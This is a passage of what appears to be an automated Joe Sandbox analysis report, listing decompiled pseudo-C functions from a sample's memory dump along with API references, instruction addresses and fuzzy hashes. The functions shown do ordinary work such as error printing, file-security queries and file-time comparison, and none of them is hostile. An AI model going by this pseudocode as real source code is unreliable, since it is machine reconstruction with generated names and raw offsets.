                                                                                                    0x003ec87d
                                                                                                    0x003ec882
                                                                                                    0x003ec88e
                                                                                                    0x003ec891
                                                                                                    0x003ec895
                                                                                                    0x003ec895
                                                                                                    0x003ec8a0
                                                                                                    0x003ec8a6
                                                                                                    0x003ec8ae
                                                                                                    0x003ec8b0
                                                                                                    0x003ec8b0
                                                                                                    0x003ec8b9
                                                                                                    0x003ec8c7
                                                                                                    0x003ec8cb
                                                                                                    0x003ec8d0
                                                                                                    0x003ec8e1
                                                                                                    0x003ec8ea
                                                                                                    0x003ec8f1
                                                                                                    0x003ec8f6
                                                                                                    0x003ec8ff
                                                                                                    0x003ec90c
                                                                                                    0x003ec913
                                                                                                    0x003ec926
                                                                                                    0x003ec92c
                                                                                                    0x003ec8a0
                                                                                                    0x003ec934
                                                                                                    0x003ec93c

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: fputs$H_prolog
                                                                                                    • String ID: :
                                                                                                    • API String ID: 2614055831-3653984579
                                                                                                    • Opcode ID: f19afa1a6821e8770b198147dbf56a7695fe7c1a92ee6fff4cd596f5e59fc221
                                                                                                    • Instruction ID: 5c5190ed694001d440591eb579f8ca45f872b75cbb6c4aafa9981b5e09df986c
                                                                                                    • Opcode Fuzzy Hash: f19afa1a6821e8770b198147dbf56a7695fe7c1a92ee6fff4cd596f5e59fc221
                                                                                                    • Instruction Fuzzy Hash: 59110331A10200DFCB16AF61D892EFFF7B2EF84304F10422EE91A1B681DB346841CB61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003EA37B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 81%
                                                                                                    			E003EA37B(char __edx) {
				char _v8;
				void* __ecx;
				int _t6;
				char* _t13;
				void* _t14;
				intOrPtr _t15;
				struct _IO_FILE** _t17;
				char _t24;
				void* _t25;
				struct _IO_FILE** _t30;
				void* _t31;
				struct _IO_FILE** _t32;

				_t24 = __edx;
				_push(_t17);
				_t30 =  *0x43a898; // 0x43a5a0
				_v8 = __edx;
				_t13 = _t17;
				if(_t30 != 0) {
					E003B1FA0(_t30);
					fputs("ERROR: ",  *_t30);
					fputs(_t13,  *_t30);
					_t17 = _t30;
					E003B1FA0(_t17);
					_t25 = _t25;
				}
				_t6 =  &_v8;
				L0041F1D0();
				_t31 = _t6;
				_t14 = 0x436090;
				_push(_t14);
				_push(_t31);
				_t32 = _t17;
				_push(_t25);
				_t15 = _t24;
				if(_t32 != 0) {
					fputs( *0x42d3d0,  *_t32); // executed
					_t6 = E003B1FA0(_t32);
					if(_t15 != 0) {
						_t6 = fputs( *0x42d3d4,  *_t32);
					}
				}
				return _t6;
			}















                                                                                                    0x003ea37b
                                                                                                    0x003ea37e
                                                                                                    0x003ea381
                                                                                                    0x003ea387
                                                                                                    0x003ea38c
                                                                                                    0x003ea38e
                                                                                                    0x003ea393
                                                                                                    0x003ea3a5
                                                                                                    0x003ea3aa
                                                                                                    0x003ea3af
                                                                                                    0x003ea3b1
                                                                                                    0x003ea3b6
                                                                                                    0x003ea3b6
                                                                                                    0x003ea3c2
                                                                                                    0x003ea3c6
                                                                                                    0x003ea3cb
                                                                                                    0x003ea3cc
                                                                                                    0x003ea3cd
                                                                                                    0x003ea3ce
                                                                                                    0x003ea3cf
                                                                                                    0x003ea3d1
                                                                                                    0x003ea3d4
                                                                                                    0x003ea3d6
                                                                                                    0x003ea3e6
                                                                                                    0x003ea3ec
                                                                                                    0x003ea3f3
                                                                                                    0x003ea3fd
                                                                                                    0x003ea400
                                                                                                    0x003ea3f3
                                                                                                    0x003ea404

                                                                                                    APIs
                                                                                                    • _CxxThrowException.MSVCRT(?,00436090), ref: 003EA3C6
                                                                                                      • Part of subcall function 003B1FA0: fputc.MSVCRT ref: 003B1FA7
                                                                                                    • fputs.MSVCRT ref: 003EA3A5
                                                                                                    • fputs.MSVCRT ref: 003EA3AA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: fputs$ExceptionThrowfputc
                                                                                                    • String ID: ERROR:
                                                                                                    • API String ID: 2339886702-977468659
                                                                                                    • Opcode ID: c0c53272f6a18f7f41e92c999055c1f7167ce20d4a2efaec28ab902d06743b79
                                                                                                    • Instruction ID: 5d0750bf9fd8ed6fcc93c11757beb9ac86ac381b36f0a7d585db6af9ceb3d630
                                                                                                    • Opcode Fuzzy Hash: c0c53272f6a18f7f41e92c999055c1f7167ce20d4a2efaec28ab902d06743b79
                                                                                                    • Instruction Fuzzy Hash: 1EF02731A00218BB8B05BB99DC118AEB3FCDF48700751001BF50093200C6756E008BD8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003E600F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E003E600F(void* __ecx, void* __eflags, char* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v34;
				char _v35;
				char _v36;
				struct _IO_FILE** _t19;

				_v36 = 0x3a;
				_v35 = 0x20;
				L003B18FB( &_v34, _a8, _a12);
				_t19 =  *(__ecx + 0xb8);
				fputs(_a4,  *_t19);
				fputs( &_v36,  *_t19);
				return E003B1FA0(_t19);
			}







                                                                                                    0x003e601f
                                                                                                    0x003e6026
                                                                                                    0x003e602a
                                                                                                    0x003e602f
                                                                                                    0x003e6040
                                                                                                    0x003e6048
                                                                                                    0x003e6057

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: fputs$fputc
                                                                                                    • String ID: $:
                                                                                                    • API String ID: 1185151155-4041779174
                                                                                                    • Opcode ID: 382cf9faf5cd6f058a2db3e7fca2be3f6c5d4137b7a80980a100e516683335c8
                                                                                                    • Instruction ID: a56b0c461a16e32a4109e567163e6e085d81f73dd24bec2732fb6c3d3ac11616
                                                                                                    • Opcode Fuzzy Hash: 382cf9faf5cd6f058a2db3e7fca2be3f6c5d4137b7a80980a100e516683335c8
                                                                                                    • Instruction Fuzzy Hash: F3F0A032900258EBCF226FA5CC05DDEBF79EF98314F040419ED9527291C734A525CBA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003DC96B Relevance: 6.3, APIs: 5, Instructions: 68COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 60%
                                                                                                    			E003DC96B(signed int _a4, intOrPtr _a8, signed int* _a12) {
				void* _t12;
				signed int _t13;
				signed int _t16;
				signed int _t19;
				intOrPtr _t20;
				signed int* _t21;

				_t21 = _a12;
				_t20 = _a8;
				 *_t21 =  *_t21 & 0x00000000;
				_push(0x10);
				_push(0x42fe10);
				_push(_t20);
				L0041F374();
				if(_t12 != 0) {
					_push(0x10);
					_push(0x42d080);
					_push(_t20);
					L0041F374();
					if(_t12 == 0) {
						goto L1;
					}
					_push(0x10);
					_push(0x42d0b0);
					_push(_t20);
					L0041F374();
					if(_t12 != 0) {
						_push(0x10);
						_push(0x42d0d0);
						_push(_t20);
						L0041F374();
						if(_t12 != 0) {
							_push(0x10);
							_push(0x42d1a0);
							_push(_t20);
							L0041F374();
							if(_t12 != 0) {
								return 0x80004002;
							}
							_t13 = _a4;
							_t16 = _t13;
							_t19 = _t13 + 0xc;
							L9:
							asm("sbb ecx, ecx");
							 *_t21 =  ~_t16 & _t19;
							L10:
							 *((intOrPtr*)(_t13 + 0x14)) =  *((intOrPtr*)(_t13 + 0x14)) + 1;
							return 0;
						}
						_t13 = _a4;
						_t16 = _t13;
						_t19 = _t13 + 8;
						goto L9;
					}
					_t13 = _a4;
					_t16 = _t13;
					_t19 = _t13 + 4;
					goto L9;
				}
				L1:
				_t13 = _a4;
				 *_t21 = _t13;
				goto L10;
			}









                                                                                                    0x003dc96f
                                                                                                    0x003dc973
                                                                                                    0x003dc976
                                                                                                    0x003dc979
                                                                                                    0x003dc97b
                                                                                                    0x003dc980
                                                                                                    0x003dc981
                                                                                                    0x003dc98b
                                                                                                    0x003dc994
                                                                                                    0x003dc996
                                                                                                    0x003dc99b
                                                                                                    0x003dc99c
                                                                                                    0x003dc9a6
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003dc9a8
                                                                                                    0x003dc9aa
                                                                                                    0x003dc9af
                                                                                                    0x003dc9b0
                                                                                                    0x003dc9ba
                                                                                                    0x003dc9c6
                                                                                                    0x003dc9c8
                                                                                                    0x003dc9cd
                                                                                                    0x003dc9ce
                                                                                                    0x003dc9d8
                                                                                                    0x003dc9e4
                                                                                                    0x003dc9e6
                                                                                                    0x003dc9eb
                                                                                                    0x003dc9ec
                                                                                                    0x003dc9f6
                                                                                                    0x00000000
                                                                                                    0x003dca0f
                                                                                                    0x003dc9f8
                                                                                                    0x003dc9fb
                                                                                                    0x003dc9fd
                                                                                                    0x003dca00
                                                                                                    0x003dca02
                                                                                                    0x003dca06
                                                                                                    0x003dca08
                                                                                                    0x003dca08
                                                                                                    0x00000000
                                                                                                    0x003dca0b
                                                                                                    0x003dc9da
                                                                                                    0x003dc9dd
                                                                                                    0x003dc9df
                                                                                                    0x00000000
                                                                                                    0x003dc9df
                                                                                                    0x003dc9bc
                                                                                                    0x003dc9bf
                                                                                                    0x003dc9c1
                                                                                                    0x00000000
                                                                                                    0x003dc9c1
                                                                                                    0x003dc98d
                                                                                                    0x003dc98d
                                                                                                    0x003dc990
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcmp
                                                                                                    • String ID:
                                                                                                    • API String ID: 1475443563-0
                                                                                                    • Opcode ID: e7cd0f28d1b44095b08b1ec35fa541e57866e38efef6e1d54442315f12d101e0
                                                                                                    • Instruction ID: 1ec97917d0685730c5aa202b337148c0ceb3d0f2de37ced59b7b3e2e72bfd363
                                                                                                    • Opcode Fuzzy Hash: e7cd0f28d1b44095b08b1ec35fa541e57866e38efef6e1d54442315f12d101e0
                                                                                                    • Instruction Fuzzy Hash: EC11263276020AA7C7118A11EC02FFA33A85B55750F11463BFD45EB392F2B4F855D248
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003EC647 Relevance: 6.1, APIs: 4, Instructions: 100COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 97%
                                                                                                    			E003EC647(void* __ecx) {
				void* _t39;
				intOrPtr* _t65;
				char** _t81;
				void* _t84;
				void* _t87;

				E0041F1B0(E004269E4, _t87);
				_push(__ecx);
				_t84 = __ecx;
				 *(_t87 - 0x10) = 0x43a8a0;
				EnterCriticalSection(0x43a8a0);
				 *((intOrPtr*)(_t87 - 4)) = 0;
				if( *((intOrPtr*)(_t87 + 0x14)) == 0 ||  *(_t84 + 0xb0) == 0) {
					 *((char*)(_t87 + 0x17)) = 0;
				} else {
					 *((char*)(_t87 + 0x17)) = 1;
					L003E5BC2(_t84);
					_t81 = _t84 + 0xc4;
					E003B2711(_t81,  *((intOrPtr*)(_t87 + 0x10)));
					if( *((intOrPtr*)(_t87 + 8)) != 0) {
						E003B2820();
					}
					fputs( *_t81,  *( *(_t84 + 0xb0)));
					_t82 = _t84 + 0xd0;
					 *((intOrPtr*)(_t84 + 0xd4)) = 0;
					 *((short*)( *((intOrPtr*)(_t84 + 0xd0)))) = 0;
					if( *((intOrPtr*)(_t87 + 8)) != 0) {
						E003B2ECB(_t82,  *((intOrPtr*)(_t87 + 8)));
						if( *((intOrPtr*)(_t87 + 0xc)) != 0) {
							E003B8274(_t82);
						}
						E003B209A( *(_t84 + 0xb0), _t82);
					}
					E003B2010( *(_t84 + 0xb0), _t82, _t84 + 0xc4);
					E003B1FA0( *(_t84 + 0xb0));
					if( *((intOrPtr*)(_t84 + 0xb9)) != 0) {
						L003B1F91( *(_t84 + 0xb0));
					}
				}
				if( *((intOrPtr*)(_t84 + 0xa4)) != 0) {
					if( *((intOrPtr*)(_t84 + 0xbc)) >= 1) {
						_t80 = _t84 + 0x24;
						_t65 = _t84 + 0x18;
						 *((intOrPtr*)(_t84 + 0x28)) = 0;
						 *((short*)( *((intOrPtr*)(_t84 + 0x24)))) = 0;
						 *((intOrPtr*)(_t65 + 4)) = 0;
						 *((char*)( *_t65)) = 0;
						if( *((intOrPtr*)(_t84 + 0xbc)) > 1 ||  *((intOrPtr*)(_t87 + 0x17)) == 0) {
							E003B2711(_t65,  *((intOrPtr*)(_t87 + 0x10)));
							if( *((intOrPtr*)(_t87 + 8)) != 0) {
								E003B2ECB(_t80,  *((intOrPtr*)(_t87 + 8)));
							}
						}
					}
					E003EB734(_t84);
				}
				_t39 = E003E571F();
				LeaveCriticalSection(0x43a8a0);
				 *[fs:0x0] =  *((intOrPtr*)(_t87 - 0xc));
				return _t39;
			}








                                                                                                    0x003ec64c
                                                                                                    0x003ec651
                                                                                                    0x003ec65a
                                                                                                    0x003ec65d
                                                                                                    0x003ec660
                                                                                                    0x003ec66b
                                                                                                    0x003ec66e
                                                                                                    0x003ec79b
                                                                                                    0x003ec680
                                                                                                    0x003ec682
                                                                                                    0x003ec686
                                                                                                    0x003ec68e
                                                                                                    0x003ec696
                                                                                                    0x003ec69e
                                                                                                    0x003ec6a2
                                                                                                    0x003ec6a2
                                                                                                    0x003ec6b1
                                                                                                    0x003ec6c0
                                                                                                    0x003ec6c8
                                                                                                    0x003ec6cb
                                                                                                    0x003ec6ce
                                                                                                    0x003ec6d5
                                                                                                    0x003ec6dd
                                                                                                    0x003ec6e1
                                                                                                    0x003ec6e1
                                                                                                    0x003ec6ed
                                                                                                    0x003ec6ed
                                                                                                    0x003ec700
                                                                                                    0x003ec70b
                                                                                                    0x003ec716
                                                                                                    0x003ec71e
                                                                                                    0x003ec71e
                                                                                                    0x003ec716
                                                                                                    0x003ec729
                                                                                                    0x003ec732
                                                                                                    0x003ec737
                                                                                                    0x003ec73a
                                                                                                    0x003ec73d
                                                                                                    0x003ec740
                                                                                                    0x003ec745
                                                                                                    0x003ec748
                                                                                                    0x003ec751
                                                                                                    0x003ec75b
                                                                                                    0x003ec763
                                                                                                    0x003ec76a
                                                                                                    0x003ec76a
                                                                                                    0x003ec763
                                                                                                    0x003ec751
                                                                                                    0x003ec771
                                                                                                    0x003ec771
                                                                                                    0x003ec776
                                                                                                    0x003ec782
                                                                                                    0x003ec790
                                                                                                    0x003ec798

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003EC64C
                                                                                                    • EnterCriticalSection.KERNEL32(0043A8A0,?,00000001,?,?,003EC9D3,?,0000006F,0000006F,?,?,00000000), ref: 003EC660
                                                                                                    • fputs.MSVCRT ref: 003EC6B1
                                                                                                    • LeaveCriticalSection.KERNEL32(0043A8A0,?,00000001,?,?,003EC9D3,?,0000006F,0000006F,?,?,00000000), ref: 003EC782
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$EnterH_prologLeavefputs
                                                                                                    • String ID:
                                                                                                    • API String ID: 2174113412-0
                                                                                                    • Opcode ID: 4cd19d98b736dc9270c2e1d430292a83666f68a2387e83228ed5f436cee72ce2
                                                                                                    • Instruction ID: d7fd93bc21cbd9b0ea3f6555c27b8cfac7a507a677f200884bf56034a060f64c
                                                                                                    • Opcode Fuzzy Hash: 4cd19d98b736dc9270c2e1d430292a83666f68a2387e83228ed5f436cee72ce2
                                                                                                    • Instruction Fuzzy Hash: 5E41AD31610795DFCB26AF61C4917EEBBA2BF44304F04462EE58A4B291CB30AC02CB96
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003CEF0F Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E003CEF0F(void* __ecx, WCHAR** _a4, signed int* _a8) {
				long _v8;
				long _v12;
				long _v16;
				WCHAR* _v20;
				int _t39;
				long _t40;
				void* _t41;
				int _t45;
				long _t49;
				struct _SECURITY_DESCRIPTOR** _t65;
				void* _t68;

				_t68 = __ecx;
				 *_a8 =  *_a8 | 0xffffffff;
				_v16 = 7;
				if( *((char*)(__ecx + 0x94)) != 0) {
					_v16 = 0xf;
				}
				_t65 = _t68 + 0x8c;
				_v8 = _v8 & 0x00000000;
				_t39 = GetFileSecurityW( *_a4, _v16,  *(_t68 + 0x8c),  *(_t68 + 0x90),  &_v12);
				_v20 = _t39;
				if(_t39 == 0) {
					_t40 = GetLastError();
					_v8 = _t40;
					if(_t40 != 0x7a) {
						goto L9;
					} else {
						_t42 = _v12;
						if(_v12 >  *(_t68 + 0x90)) {
							E003B421F(_t65, _t42);
							_v20 =  *_a4;
							_t45 = GetFileSecurityW(_v20, _v16,  *_t65,  *(_t68 + 0x90),  &_v12);
							_v20 = _t45;
							if(_t45 == 0) {
								_v8 = GetLastError();
							} else {
								if(_v12 !=  *(_t68 + 0x90)) {
									goto L5;
								}
							}
							goto L15;
						} else {
							_v8 = 1;
							goto L9;
						}
					}
				} else {
					_t49 = _v12;
					if(_t49 == 0) {
						L17:
						_t41 = 0;
					} else {
						if(_t49 >  *(_t68 + 0x90)) {
							L5:
							_v8 = 1;
						}
						L15:
						if(_v20 == 0) {
							L9:
							_t41 = E003CEBF8(_t68, _a4, _v8);
						} else {
							 *_a8 = L003BFE26(_t68 + 0x68,  *_t65, _v12);
							goto L17;
						}
					}
				}
				return _t41;
			}














                                                                                                    0x003cef1a
                                                                                                    0x003cef1c
                                                                                                    0x003cef27
                                                                                                    0x003cef2e
                                                                                                    0x003cef30
                                                                                                    0x003cef30
                                                                                                    0x003cef46
                                                                                                    0x003cef4f
                                                                                                    0x003cef62
                                                                                                    0x003cef66
                                                                                                    0x003cef69
                                                                                                    0x003cef8b
                                                                                                    0x003cef94
                                                                                                    0x003cef97
                                                                                                    0x00000000
                                                                                                    0x003cef99
                                                                                                    0x003cef99
                                                                                                    0x003cefa2
                                                                                                    0x003cefc2
                                                                                                    0x003cefd4
                                                                                                    0x003cefe3
                                                                                                    0x003cefe7
                                                                                                    0x003cefea
                                                                                                    0x003cefff
                                                                                                    0x003cefec
                                                                                                    0x003ceff5
                                                                                                    0x00000000
                                                                                                    0x003ceff7
                                                                                                    0x003ceff5
                                                                                                    0x00000000
                                                                                                    0x003cefa4
                                                                                                    0x003cefa4
                                                                                                    0x00000000
                                                                                                    0x003cefa4
                                                                                                    0x003cefa2
                                                                                                    0x003cef6b
                                                                                                    0x003cef6b
                                                                                                    0x003cef70
                                                                                                    0x003cf01b
                                                                                                    0x003cf01b
                                                                                                    0x003cef76
                                                                                                    0x003cef7c
                                                                                                    0x003cef82
                                                                                                    0x003cef82
                                                                                                    0x003cef82
                                                                                                    0x003cf002
                                                                                                    0x003cf006
                                                                                                    0x003cefab
                                                                                                    0x003cefb3
                                                                                                    0x003cf008
                                                                                                    0x003cf019
                                                                                                    0x00000000
                                                                                                    0x003cf019
                                                                                                    0x003cf006
                                                                                                    0x003cef70
                                                                                                    0x003cefbc

                                                                                                    APIs
                                                                                                    • GetFileSecurityW.ADVAPI32(?,00000007,?,?,00000000,?,?,00000000,?), ref: 003CEF62
                                                                                                    • GetLastError.KERNEL32(?,?,00000000,?), ref: 003CEF8B
                                                                                                    • GetFileSecurityW.ADVAPI32(?,00000007,?,?,00000000,?,?,?,00000000,?), ref: 003CEFE3
                                                                                                    • GetLastError.KERNEL32(?,?,00000000,?,?,?,00000000,?), ref: 003CEFF9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastSecurity
                                                                                                    • String ID:
                                                                                                    • API String ID: 555121230-0
                                                                                                    • Opcode ID: 751567ca6b67cb4e3c1b797295d3f51682ab70df79a33a36e68e501f81f9b358
                                                                                                    • Instruction ID: 6e62e93d5b848be5e6b19d4b64d9fe5ae337525f09f3ee11e4aaf6046f7b909b
                                                                                                    • Opcode Fuzzy Hash: 751567ca6b67cb4e3c1b797295d3f51682ab70df79a33a36e68e501f81f9b358
                                                                                                    • Instruction Fuzzy Hash: 49311875A00209EFDB12DFA4C880FAEBBBAFB44304F11895DE465EB251D770AE45DB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003E348C Relevance: 6.1, APIs: 4, Instructions: 59timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 96%
                                                                                                    			E003E348C(void* __ecx) {
				long _t27;
				intOrPtr* _t28;
				void* _t37;
				intOrPtr _t39;
				signed int _t43;
				FILETIME* _t44;
				void* _t46;
				void* _t48;

				_t27 = E0041F1B0(0x425f54, _t48);
				_push(__ecx);
				_t46 = __ecx;
				 *(_t48 - 0x10) = 0x43a858;
				EnterCriticalSection(0x43a858);
				 *(_t48 - 4) =  *(_t48 - 4) & 0x00000000;
				if( *((char*)(_t46 + 0x12)) != 0) {
					_t43 =  *(_t48 + 8);
					if( *((char*)(_t43 + 0x7c)) != 0) {
						_t44 = _t43 + 0x5c;
						if( *((char*)(_t46 + 0x13)) == 0) {
							L4:
							 *(_t46 + 0x84) = _t44->dwLowDateTime;
							_t27 = _t44->dwHighDateTime;
							 *(_t46 + 0x88) = _t27;
						} else {
							_t27 = CompareFileTime(_t46 + 0x84, _t44);
							if(_t27 < 0) {
								goto L4;
							}
						}
						 *((char*)(_t46 + 0x13)) = 1;
					}
				}
				_t39 =  *((intOrPtr*)(_t46 + 0x18));
				 *(_t48 + 8) =  *(_t48 + 8) & 0x00000000;
				if(_t39 > 0) {
					_t28 =  *((intOrPtr*)(_t46 + 0x14));
					_t37 = _t46 + 0x14;
					while( *_t28 !=  *((intOrPtr*)(_t48 + 0xc))) {
						 *(_t48 + 8) =  *(_t48 + 8) + 1;
						_t28 = _t28 + 4;
						if( *(_t48 + 8) < _t39) {
							continue;
						} else {
						}
						goto L12;
					}
					E003E353E(_t37,  *(_t48 + 8));
					_t27 = E003B50A5(_t46 + 0x20,  *(_t48 + 8));
				}
				L12:
				LeaveCriticalSection(0x43a858);
				 *[fs:0x0] =  *((intOrPtr*)(_t48 - 0xc));
				return _t27;
			}











                                                                                                    0x003e3491
                                                                                                    0x003e3496
                                                                                                    0x003e349f
                                                                                                    0x003e34a2
                                                                                                    0x003e34a5
                                                                                                    0x003e34ab
                                                                                                    0x003e34b3
                                                                                                    0x003e34b5
                                                                                                    0x003e34bc
                                                                                                    0x003e34be
                                                                                                    0x003e34c5
                                                                                                    0x003e34d9
                                                                                                    0x003e34db
                                                                                                    0x003e34e1
                                                                                                    0x003e34e4
                                                                                                    0x003e34c7
                                                                                                    0x003e34cf
                                                                                                    0x003e34d7
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e34d7
                                                                                                    0x003e34ea
                                                                                                    0x003e34ea
                                                                                                    0x003e34bc
                                                                                                    0x003e34ee
                                                                                                    0x003e34f1
                                                                                                    0x003e34f7
                                                                                                    0x003e34f9
                                                                                                    0x003e34fc
                                                                                                    0x003e34ff
                                                                                                    0x003e3506
                                                                                                    0x003e3509
                                                                                                    0x003e350f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e3511
                                                                                                    0x00000000
                                                                                                    0x003e350f
                                                                                                    0x003e3516
                                                                                                    0x003e3521
                                                                                                    0x003e3521
                                                                                                    0x003e3526
                                                                                                    0x003e3527
                                                                                                    0x003e3533
                                                                                                    0x003e353b

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003E3491
                                                                                                    • EnterCriticalSection.KERNEL32(0043A858), ref: 003E34A5
                                                                                                    • CompareFileTime.KERNEL32(?,?), ref: 003E34CF
                                                                                                    • LeaveCriticalSection.KERNEL32(0043A858), ref: 003E3527
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$CompareEnterFileH_prologLeaveTime
                                                                                                    • String ID:
                                                                                                    • API String ID: 3800395459-0
                                                                                                    • Opcode ID: 05738d525fa2c4bf065298773926197258b3f6cffaf23681301bf5101c55d275
                                                                                                    • Instruction ID: 0b74845ebc89d57e8ae67f3483763ca052a64cb9a578f4e4d5457e6291a0bec2
                                                                                                    • Opcode Fuzzy Hash: 05738d525fa2c4bf065298773926197258b3f6cffaf23681301bf5101c55d275
                                                                                                    • Instruction Fuzzy Hash: 2221AE31600695EFDB328F26D44879ABBF4FF44304F04862AE84A97691D774EA48CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

